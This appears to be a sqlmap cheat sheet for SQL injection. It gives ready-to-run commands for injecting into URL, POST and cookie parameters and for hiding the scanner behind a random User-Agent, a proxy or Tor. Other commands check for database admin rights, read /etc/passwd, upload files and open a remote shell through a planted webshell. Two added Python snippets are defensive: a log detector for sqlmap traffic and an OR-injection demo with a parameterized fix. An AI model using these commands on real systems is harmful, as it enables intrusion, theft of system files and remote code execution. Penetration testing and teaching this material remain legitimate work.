
# sqlmap

## Verbose Level (-v)

* 0: displays critical info only
* 1: displays warning info
* 2: displays debug info
* **3: displays payload used**
* 4: displays HTTP request body
* 5: displays HTTP response headers
* 6: displays HTTP response body

## Database Connection (-d)

Connect directly to a database with credentials (the DBMS name goes in the scheme, the database name at the end of the path; this form applies to MySQL, Oracle, Microsoft SQL Server and PostgreSQL):

```shell
# DBMS is one of: mysql, oracle, mssql, postgresql
sqlmap -d DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
```

or connect to a file-based database (SQLite, Microsoft Access, Firebird), giving the path to the database file:

```shell
# DBMS is one of: sqlite, access, firebird
sqlmap -d DBMS://DATABASE_FILEPATH
```

## GET (-u)

```shell
sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users
```

## POST (--data)

```shell
sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users
```

## Load Request from a File (-r)

```bash
sqlmap -r <request_from_burp>
```

## Cookie (--cookie)

```shell
sqlmap -u <url> --cookie <cookie>
```

## User-Agent (--user-agent)

The default `User-Agent` header sent by sqlmap is `sqlmap/1.0-dev-xxxxxxx`, which is easy to spot in web server logs, but a custom `User-Agent` header can be specified:

```shell
sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users
```

or set a random user agent:

```shell
sqlmap -u <url> --random-agent -f --banner --dbs --users
```
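From the defender's side, the default `User-Agent` above is the cheapest sqlmap indicator there is. The following added example (not part of the original page) parses a few constructed access-log lines in the common "combined" format and flags the requests whose `User-Agent` starts with the `sqlmap/` product token. The log lines, IP addresses and version strings are all constructed for the demo.

```python
import re
from collections import Counter

# Constructed sample lines in Apache/nginx "combined" log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev-a1b2c3d (https://sqlmap.org)"
10.0.0.7 - - [12/Mar/2024:10:01:03 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0"
10.0.0.5 - - [12/Mar/2024:10:01:04 +0000] "GET /vuln.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.11#stable (https://sqlmap.org)"
10.0.0.9 - - [12/Mar/2024:10:01:05 +0000] "POST /vuln.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/119.0"
"""

# One regex for the combined log format: ip, ident, user, [time], "request", status, size, "referer", "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format line into a dict of named fields, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def is_sqlmap_ua(user_agent):
    """True when the User-Agent carries sqlmap's default product token (case-insensitive)."""
    return user_agent.lower().startswith("sqlmap/")


def find_sqlmap_requests(log_text):
    """Return the parsed entries whose User-Agent is sqlmap's default, in log order."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_sqlmap_ua(entry["ua"]):
            hits.append(entry)
    return hits


def sqlmap_hits_by_ip(log_text):
    """Count flagged requests per source address, to prioritise triage."""
    return Counter(entry["ip"] for entry in find_sqlmap_requests(log_text))


if __name__ == "__main__":
    for entry in find_sqlmap_requests(SAMPLE_LOG):
        print(f'{entry["ip"]} {entry["request"]} -> {entry["ua"]}')
    print(dict(sqlmap_hits_by_ip(SAMPLE_LOG)))
```

Because `--user-agent` and `--random-agent` replace the header, a match here is a high-confidence but low-coverage signal: treat a miss as meaningless and correlate with request behaviour instead (many variants of the same parameter from one source in a short window, as in the third sample line).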

## Level (--level)

* `--level=1`: default mode
* `--level=2`: adds cookie testing
* `--level=3`: adds User-Agent testing
* `--level=4`: more testing
* `--level=5`: adds Host testing

{% hint style="info" %}
Note that the use of the `-p` switch bypasses the level. This means that by manually setting the parameter to test, you can perform a more accurate, stealthy and in-depth exploitation.
{% endhint %}

## Risk (--risk)

* `--risk=1`: (Default) innocuous injections
* `--risk=2`: Enables heavy time-based injections
* `--risk=3`: Enables OR-based injections -> using them on UPDATE queries would update all the rows in a table
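To make the risk-3 caveat concrete, here is an added example (not from the original page) in Python against an in-memory SQLite table: the same `UPDATE` written with string formatting and with bound parameters, run with a normal id and with a constructed `OR`-based value of the kind `--risk=3` enables. The table, rows and payload are all constructed for the demo.

```python
import sqlite3

# Constructed demo data: three users in an in-memory SQLite table.
SEED_USERS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]


def make_db():
    """Create a fresh in-memory database seeded with SEED_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (id, name, email) VALUES (?, ?, ?)", SEED_USERS)
    conn.commit()
    return conn


def update_email_vulnerable(conn, user_id, new_email):
    """Builds the statement by string formatting; user_id is pasted into WHERE unescaped."""
    sql = f"UPDATE users SET email = '{new_email}' WHERE id = {user_id}"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # number of rows the UPDATE touched


def update_email_safe(conn, user_id, new_email):
    """Type-checks the id and binds both values as parameters, so no input can widen WHERE."""
    if not isinstance(user_id, int):
        raise TypeError("user_id must be an integer")
    cur = conn.execute("UPDATE users SET email = ? WHERE id = ?", (new_email, user_id))
    conn.commit()
    return cur.rowcount


def rows_with_email(conn, email):
    """Count rows holding the given email, to verify how far an UPDATE reached."""
    return conn.execute("SELECT COUNT(*) FROM users WHERE email = ?", (email,)).fetchone()[0]


if __name__ == "__main__":
    payload = "1 OR 1=1"  # constructed OR-based payload of the kind --risk=3 enables
    conn = make_db()
    print("vulnerable, id='1':", update_email_vulnerable(conn, "1", "a@example.com"))        # 1
    print("vulnerable, id=payload:", update_email_vulnerable(conn, payload, "x@example.com"))  # 3: every row rewritten
    conn = make_db()
    print("safe, id=1:", update_email_safe(conn, 1, "a@example.com"))  # 1
    try:
        update_email_safe(conn, payload, "x@example.com")
    except TypeError as exc:
        print("safe, id=payload:", exc)
```

The `WHERE id = 1 OR 1=1` clause the vulnerable version produces is exactly why `--risk=3` against a live `UPDATE` or `DELETE` endpoint destroys data: run it only against a copy of the target, and fix the application by binding parameters as in the safe version.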

## Proxy (--proxy) and Tor (--tor)

Proxy:

```shell
sqlmap --proxy <proxy> -u <url> -f --banner --dbs --users
```

Tor:

```shell
sqlmap --tor -u <url> -f --banner --dbs --users
```

## Blind SQLi (--string, --not-string)

* Pass to `--string` a string that is always present in the `True` response page
* Pass to `--not-string` a string that is always present in the `False` response page

## Privilege Enumeration (--is-dba)

Determine if the current user is the database admin:

```shell
sqlmap -u <url> --is-dba
```

## Download/Upload (--file-read/--file-write/--file-dest)

Download a file:

```shell
sqlmap -u <url> --file-read /etc/passwd
```

Upload a file:

```shell
sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>
```

## RCE (--os-shell)

The following requirements must be satisfied for `--os-shell` to work:

1. The database user has write permission on the file system
2. Path names are the defaults
3. PHP `magic_quotes_gpc` is disabled

```shell
sqlmap -u <url> --os-shell
```

Behind the scenes, sqlmap first creates an **"upload trojan"** on the target machine and then uses it to upload a **webshell**.

If the `-d` option is used (direct database connection), sqlmap uses a **UDF** (user-defined function) instead. For example:

```bash
sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell
```
